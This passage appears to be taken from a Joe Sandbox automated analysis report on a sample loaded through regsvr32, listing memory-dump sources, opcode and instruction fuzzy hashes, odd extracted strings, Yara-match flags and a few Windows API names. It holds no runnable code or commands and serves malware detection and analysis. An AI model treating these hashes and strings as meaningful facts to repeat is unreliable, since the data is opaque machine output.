                                                                                                                            • Instruction Fuzzy Hash: B6F1DF70504749EFCB98CF28D18AACE7BE0FB48348F50812AF81A9B264D770DA59DB45
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: =_$F)k$b/$syG
                                                                                                                            • API String ID: 0-3955183656
                                                                                                                            • Opcode ID: a0c8fbb251499c36d1c33fbfac3bbb926034851086b3556ae4bae43476727e6a
                                                                                                                            • Instruction ID: 3a63fdd7148b145f5d2717dabea2a2fa508061acbcc25a132c341bfe6e9ad30f
                                                                                                                            • Opcode Fuzzy Hash: a0c8fbb251499c36d1c33fbfac3bbb926034851086b3556ae4bae43476727e6a
                                                                                                                            • Instruction Fuzzy Hash: DED12771A0478D8BCF59DFA8C88A6EEBBB0FB48344F10421DE846A7650D7B4D909CF85
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: #X$'Xsa$iJ6$vG
                                                                                                                            • API String ID: 0-746338152
                                                                                                                            • Opcode ID: 05ea12fd72043b3df7b90193803f13f9b9661e31632ee757fcd333ad07ef3f6f
                                                                                                                            • Instruction ID: 8ba50615c78112980223cca8f04f1fa67c4b69ee5a809e4e0bd2b8ae6832a1bb
                                                                                                                            • Opcode Fuzzy Hash: 05ea12fd72043b3df7b90193803f13f9b9661e31632ee757fcd333ad07ef3f6f
                                                                                                                            • Instruction Fuzzy Hash: 93E154B590070DDFCB88DF68D19A9DD7BB9BB49308F404029FC0E9A264D3B4E919CB56
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: *i^$MIC$-Z$]2
                                                                                                                            • API String ID: 0-498664264
                                                                                                                            • Opcode ID: db11ef6343568e39e87295be28a4fb69218d9fc865c563580501f4fd78a225ea
                                                                                                                            • Instruction ID: 9792ecb135b2155067e966d5e38dbf4f409fde80c29e70d57d2078ebe1ce15c6
                                                                                                                            • Opcode Fuzzy Hash: db11ef6343568e39e87295be28a4fb69218d9fc865c563580501f4fd78a225ea
                                                                                                                            • Instruction Fuzzy Hash: 10E1C670109B888FDBF8DF64CC86BEB7BA5FB44346F10651DD84A8A290DBB46645CF41
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: B$EG$QsF$_
                                                                                                                            • API String ID: 0-784369960
                                                                                                                            • Opcode ID: 2411b4f18f6ae95c167793a9182b69dfaeb4b2ef39c1ac24af76ef798b153418
                                                                                                                            • Instruction ID: 62dbbc71664ee0946fffbba3b71afe09b12d9ffe0d1744d6deb9db65ff0cd9cc
                                                                                                                            • Opcode Fuzzy Hash: 2411b4f18f6ae95c167793a9182b69dfaeb4b2ef39c1ac24af76ef798b153418
                                                                                                                            • Instruction Fuzzy Hash: 3FB1387010468D8FDF88DF28C88A6DA3FA1FB68388F614219FC4A97250C778D694CBC5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: -`G$.$5B.Y$Z`35
                                                                                                                            • API String ID: 0-1363032466
                                                                                                                            • Opcode ID: bf60aa8e83620137796280cd5bd0e9d08ed9dd04dd302297e234b85e3718d0fd
                                                                                                                            • Instruction ID: b244d414363a4385de25ad5610b22aaac7fb2f2c92cf8150697ad32e565f4bd8
                                                                                                                            • Opcode Fuzzy Hash: bf60aa8e83620137796280cd5bd0e9d08ed9dd04dd302297e234b85e3718d0fd
                                                                                                                            • Instruction Fuzzy Hash: 29A1FB716157888FEB7ADF24C89A7CE7BE1FB49308F40461DD98E8A250D7B49609CB42
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: *+_$WSh$\O$#o
                                                                                                                            • API String ID: 0-1846314129
                                                                                                                            • Opcode ID: 2b55738af9202b4623c877c52658b874745984570bac3296ae94d1111b904a17
                                                                                                                            • Instruction ID: 175ce4bc0e22c7a636d32034be2bbb8ad42f6b3cb6a748f64f507b7f0b29ed37
                                                                                                                            • Opcode Fuzzy Hash: 2b55738af9202b4623c877c52658b874745984570bac3296ae94d1111b904a17
                                                                                                                            • Instruction Fuzzy Hash: 1971167160474ECFCB98DF18C489ADA3BE1FB58318F414529FC09A7264DB74DAA8CB85
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: .B$O$M*K$\<
                                                                                                                            • API String ID: 0-3225238681
                                                                                                                            • Opcode ID: 97d1f14c936b4c6fd28126f9270f10017570076f2259e30e0790da2a5d8d89f7
                                                                                                                            • Instruction ID: 95d2fbb8f7fe970b1359d27f41ccd6aad584115d4fee043204e0c0f4c3f3b287
                                                                                                                            • Opcode Fuzzy Hash: 97d1f14c936b4c6fd28126f9270f10017570076f2259e30e0790da2a5d8d89f7
                                                                                                                            • Instruction Fuzzy Hash: 7181E370549788CFEBBACF24C886BDE7BE4FB48744F20461DE85A8A260DB709645CF41
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: $$$$xVO$~O
                                                                                                                            • API String ID: 0-3655128719
                                                                                                                            • Opcode ID: f0a1fe130e7a88269555c94ae3afa6992adf671055acde803b367a0cf8dc4998
                                                                                                                            • Instruction ID: 8f78542db34460f4381821bab2b7e4f68a699ed7f8b2fc47c959991f0b02677a
                                                                                                                            • Opcode Fuzzy Hash: f0a1fe130e7a88269555c94ae3afa6992adf671055acde803b367a0cf8dc4998
                                                                                                                            • Instruction Fuzzy Hash: 5B61D1B05187448FD369DF28C18965BBBF1FBC6744F008A1EF6868A260DB76D948CB47
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: ,IW$G$JMg$l
                                                                                                                            • API String ID: 0-1370644289
                                                                                                                            • Opcode ID: aa199bcfabd2ca119bc867395ae2bb0b970833e8ef3f83c28db76f19b2a25dac
                                                                                                                            • Instruction ID: 7fb8b97fd43ed4dc52a467cdcf5cca41e6e56dbc92574a5c866222c6b731b82a
                                                                                                                            • Opcode Fuzzy Hash: aa199bcfabd2ca119bc867395ae2bb0b970833e8ef3f83c28db76f19b2a25dac
                                                                                                                            • Instruction Fuzzy Hash: 0A41D3B190074E8FCB48CF64C88A5DE7FB0FB18358F10461EE85AA6250D7B89695CFC9
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277864486.00007FFC66D31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC66D30000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.277856075.00007FFC66D30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277990668.00007FFC66D82000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277996591.00007FFC66D86000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.278023191.00007FFC66D89000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7ffc66d30000_regsvr32.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _errno$__tzset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3587134695-0
                                                                                                                            • Opcode ID: 49cb08095e24ca39ac522c7ec604242f23efb3d68850c8b05a0144016971d7f9
                                                                                                                            • Instruction ID: b7aad8c11c51c5285700686a903d55d7bc2a2e19624c112db2f92eeb278e1a1e
                                                                                                                            • Opcode Fuzzy Hash: 49cb08095e24ca39ac522c7ec604242f23efb3d68850c8b05a0144016971d7f9
                                                                                                                            • Instruction Fuzzy Hash: 23028332A0C6AAC7E76C8F29D09413DAB91BB45745F64403AD7CE4A6D1CE38E544EF12
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277864486.00007FFC66D31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC66D30000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.277856075.00007FFC66D30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277990668.00007FFC66D82000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277996591.00007FFC66D86000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.278023191.00007FFC66D89000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7ffc66d30000_regsvr32.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _errno$DecodePointer_lock
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2175075375-0
                                                                                                                            • Opcode ID: 67eb2a1810ee8ae3a6f200ab40374a5628c10f79bc737fdb0890b88123cf569c
                                                                                                                            • Instruction ID: 5f1e06e7f87eb4cad30e35e28b0d01d778fd37cd6cfa7fedc4f13485926b754e
                                                                                                                            • Opcode Fuzzy Hash: 67eb2a1810ee8ae3a6f200ab40374a5628c10f79bc737fdb0890b88123cf569c
                                                                                                                            • Instruction Fuzzy Hash: D931A421B0C76BC2FB7D9A62555137AD9819F947C4F044435DECD4EA85EE3CE400EA22
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • RtlCaptureContext.KERNEL32 ref: 00007FFC66D7D357
                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32 ref: 00007FFC66D7D39D
                                                                                                                            • UnhandledExceptionFilter.KERNEL32 ref: 00007FFC66D7D3A8
                                                                                                                              • Part of subcall function 00007FFC66D76F0C: GetModuleFileNameA.KERNEL32(?,?,?,?,?,00007FFC66D77194,?,?,?,?,00007FFC66D76C69,?,?,00000000,00007FFC66D730C0), ref: 00007FFC66D76FCF
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277864486.00007FFC66D31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC66D30000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.277856075.00007FFC66D30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277990668.00007FFC66D82000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277996591.00007FFC66D86000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.278023191.00007FFC66D89000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7ffc66d30000_regsvr32.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExceptionFilterUnhandled$CaptureContextFileModuleName
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2731829486-0
                                                                                                                            • Opcode ID: 593c6449df1015ae3e331ed563d16e9abc9156b94907c07056c7b3d83921dabb
                                                                                                                            • Instruction ID: 21e7209f96375467fa72717a25b72a44eb7b22c0bc47745896700665f8bcb42d
                                                                                                                            • Opcode Fuzzy Hash: 593c6449df1015ae3e331ed563d16e9abc9156b94907c07056c7b3d83921dabb
                                                                                                                            • Instruction Fuzzy Hash: D611E321A2CAAAC2E72D9B15E8143BEA791FF84304F440139E5CD4AB95CF3DE004DF22
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: *4$5F$S^r
                                                                                                                            • API String ID: 0-3556444313
                                                                                                                            • Opcode ID: b0743c1ec2acfd1e8c25e2f2eb51529e5db6bb1cba9eb6ae32e5b6bbd2ab9b57
                                                                                                                            • Instruction ID: 3ee7e47d854a132278560872cba22db18b0762c6b33e49020313469b2ebed1ad
                                                                                                                            • Opcode Fuzzy Hash: b0743c1ec2acfd1e8c25e2f2eb51529e5db6bb1cba9eb6ae32e5b6bbd2ab9b57
                                                                                                                            • Instruction Fuzzy Hash: 5542F87154478C8BDBB8CF28C88D7DE7BE0FB54344F20461DE9AA8A261DBB49685CF41
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: &lz2$'~W$<x<
                                                                                                                            • API String ID: 0-2268522332
                                                                                                                            • Opcode ID: b4611eb32689572206be92ce00cd3efb5fa8211b09b44c780cf48fb277428f5a
                                                                                                                            • Instruction ID: 36e71a14450f7168630c03d0025ff7d4b6ed06a40f4a953d8196177a15a51c97
                                                                                                                            • Opcode Fuzzy Hash: b4611eb32689572206be92ce00cd3efb5fa8211b09b44c780cf48fb277428f5a
                                                                                                                            • Instruction Fuzzy Hash: 47E10574A14B0C8BDB69DFB8D04A6CDBBF2FB54344F20411DE80AAB292D7B49519CF85
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: $$T]0$ba^2
                                                                                                                            • API String ID: 0-1276948933
                                                                                                                            • Opcode ID: 50dab8274baf4b038fc4b99f186c2c7516c76bbdb2714b9ce32fb6facc3b6c7a
                                                                                                                            • Instruction ID: eef8b44dd2583dc88dd368a4c81b8d58a3d6fa2c6a2b719c97d70d037daa09dd
                                                                                                                            • Opcode Fuzzy Hash: 50dab8274baf4b038fc4b99f186c2c7516c76bbdb2714b9ce32fb6facc3b6c7a
                                                                                                                            • Instruction Fuzzy Hash: 1CD11470510748DBCB99CF24C88AADD7FB1FB483A8FA42219FD06A7260C775D984CB85
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 6w5*$EDO$V
                                                                                                                            • API String ID: 0-1640223502
                                                                                                                            • Opcode ID: ed1df3146ad4429725400e2b1b62204332b0e2ca82f1b7aeb1a5f2c194113b0e
                                                                                                                            • Instruction ID: 2aad62a72125add12bf3ce521e9508149cfd3cbf44ea5784fb3c25a9d2cdfef8
                                                                                                                            • Opcode Fuzzy Hash: ed1df3146ad4429725400e2b1b62204332b0e2ca82f1b7aeb1a5f2c194113b0e
                                                                                                                            • Instruction Fuzzy Hash: 07B1E67160560ECFCB88DF28C5866DE3BE0FB48318F41422AF90AA7354D774DA68CB85
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: Y()$i_"o$|Y
                                                                                                                            • API String ID: 0-942011364
                                                                                                                            • Opcode ID: 99e19844c70b9c0f3275fee4d9e8598d8799ff7d5c60b779fef480da3ab0ff5c
                                                                                                                            • Instruction ID: 0f698cdcb9f5af38e2ff44253ec0ac71ef144d8643f40abc7fb7ff20982184b6
                                                                                                                            • Opcode Fuzzy Hash: 99e19844c70b9c0f3275fee4d9e8598d8799ff7d5c60b779fef480da3ab0ff5c
                                                                                                                            • Instruction Fuzzy Hash: 5AC1F7706083889FDBBEDF28C8857CA7BA9FB46708F504519EDC98E254DB745744CB42
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: O)$,G$-
                                                                                                                            • API String ID: 0-23008916
                                                                                                                            • Opcode ID: 382f6eb2118395d632dba3a2cf122cd3a475215dc83456f13dd86c7c3519a1e5
                                                                                                                            • Instruction ID: 8302e34eee3504d26b36c965fbed976e69713b67a0f5c478fb5ffa9ec871fbb1
                                                                                                                            • Opcode Fuzzy Hash: 382f6eb2118395d632dba3a2cf122cd3a475215dc83456f13dd86c7c3519a1e5
                                                                                                                            • Instruction Fuzzy Hash: 6E81F7705106499BCF88DF28C8D6ADD7FB1FB483A8F956219FD0AA6250C774D885CB84
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: ;U[$L$Q#
                                                                                                                            • API String ID: 0-2933747092
                                                                                                                            • Opcode ID: 48c80cf55519f04e9394a4cd7563c786fdb29e452e8ba8fdd2d4b1674bf817ce
                                                                                                                            • Instruction ID: c6ef39cbec2f0f72f24e8f037401308b0178ea645a608ff4f3f67d7bb634a9bb
                                                                                                                            • Opcode Fuzzy Hash: 48c80cf55519f04e9394a4cd7563c786fdb29e452e8ba8fdd2d4b1674bf817ce
                                                                                                                            • Instruction Fuzzy Hash: 0B614E70A0870CAFDB48DF94C14AADDBBF2FB54344F0081A9E806AB251D7B59B59CB85
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 5($<:*$qwX
                                                                                                                            • API String ID: 0-3944236288
                                                                                                                            • Opcode ID: 3ff6daddd3fc5570497b4afa6ac41a8054238f95a4c1d79c70cc8b829639e233
                                                                                                                            • Instruction ID: 7f83292775578326f1885df61e48a3f2c5c3ff73894a37d4b388f2926162ec41
                                                                                                                            • Opcode Fuzzy Hash: 3ff6daddd3fc5570497b4afa6ac41a8054238f95a4c1d79c70cc8b829639e233
                                                                                                                            • Instruction Fuzzy Hash: 5B71067015878CDBEBBADF24C8897DD3BB0FB49344F90861AE84E8A250CF74574A9B41
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 79&$s`~$v;
                                                                                                                            • API String ID: 0-3844292866
                                                                                                                            • Opcode ID: beca5e7b89ed182e00fd219d55149b62bdd99575566975f419d1c5ca8939f9e6
                                                                                                                            • Instruction ID: c39f2861ae99e8b3f2b4a79ea52bf03a0f7a6e48d35fb935a0be7420e121cddb
                                                                                                                            • Opcode Fuzzy Hash: beca5e7b89ed182e00fd219d55149b62bdd99575566975f419d1c5ca8939f9e6
                                                                                                                            • Instruction Fuzzy Hash: 9B61397110478CAFDBFA9E58CC85BDD37A0FB48348F508229E9098B290DF749B4D9B46
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: wQ_$1_$ac
                                                                                                                            • API String ID: 0-1037425278
                                                                                                                            • Opcode ID: 943c7c2c61714b72029a8fd813d6c42c5c92d180aed6d879ae2838ea4b2e708e
                                                                                                                            • Instruction ID: 5ab913ef515fd25bf7fc04ce61f78e9cde1e7d2fd73709943c0f3a5cbb59c84a
                                                                                                                            • Opcode Fuzzy Hash: 943c7c2c61714b72029a8fd813d6c42c5c92d180aed6d879ae2838ea4b2e708e
                                                                                                                            • Instruction Fuzzy Hash: 1D612B7010978C8BDBF8CF54DC997EA3BA6FB54345F208519E84E8A270DB74968CCB42
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 6|$6`d$H~z
                                                                                                                            • API String ID: 0-1702722476
                                                                                                                            • Opcode ID: 6487df39d46446a395b722702bbc9accbfbbf10f6bdf8a05bf21e92dd4d708c3
                                                                                                                            • Instruction ID: dff368548e7284a50638b46c1e9eca52edd1bdea535486c94ebb7356abcac70e
                                                                                                                            • Opcode Fuzzy Hash: 6487df39d46446a395b722702bbc9accbfbbf10f6bdf8a05bf21e92dd4d708c3
                                                                                                                            • Instruction Fuzzy Hash: C351F37190074DDFCF48DFA4D98A5DEBBB0FB48308F118659E89AA7260C7B89A44CF45
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: d~$`5$t>
                                                                                                                            • API String ID: 0-1282322184
                                                                                                                            • Opcode ID: 5ab2e5105061d0cdd7dd2083328b31dc67734e2d6c9a8d2650bd0306db7847c6
                                                                                                                            • Instruction ID: 2b9aad7a7c3990d0f54026c4e2bc5a00c5a3c031faa8fbf8ed0394cc09118e70
                                                                                                                            • Opcode Fuzzy Hash: 5ab2e5105061d0cdd7dd2083328b31dc67734e2d6c9a8d2650bd0306db7847c6
                                                                                                                            • Instruction Fuzzy Hash: 9141B2B190078ECBCF48DFA8C88A1DE7BB0FB58358F104A19E965A6250D3B49664CF84
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: #St$JYr$hmn
                                                                                                                            • API String ID: 0-1556749129
                                                                                                                            • Opcode ID: 8c5881788024da3e2945e5a9e10c631b66cff36ab1256063138a18bf82cfdc40
                                                                                                                            • Instruction ID: 771f7f328e054501a5ac5c786693eba7885e85f29817745d48b7f08549072e32
                                                                                                                            • Opcode Fuzzy Hash: 8c5881788024da3e2945e5a9e10c631b66cff36ab1256063138a18bf82cfdc40
                                                                                                                            • Instruction Fuzzy Hash: 9141A2B590038E8FCF48CF68C9865DF7BB0FB58358F104A19E866A6250D3B8D665CF85
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
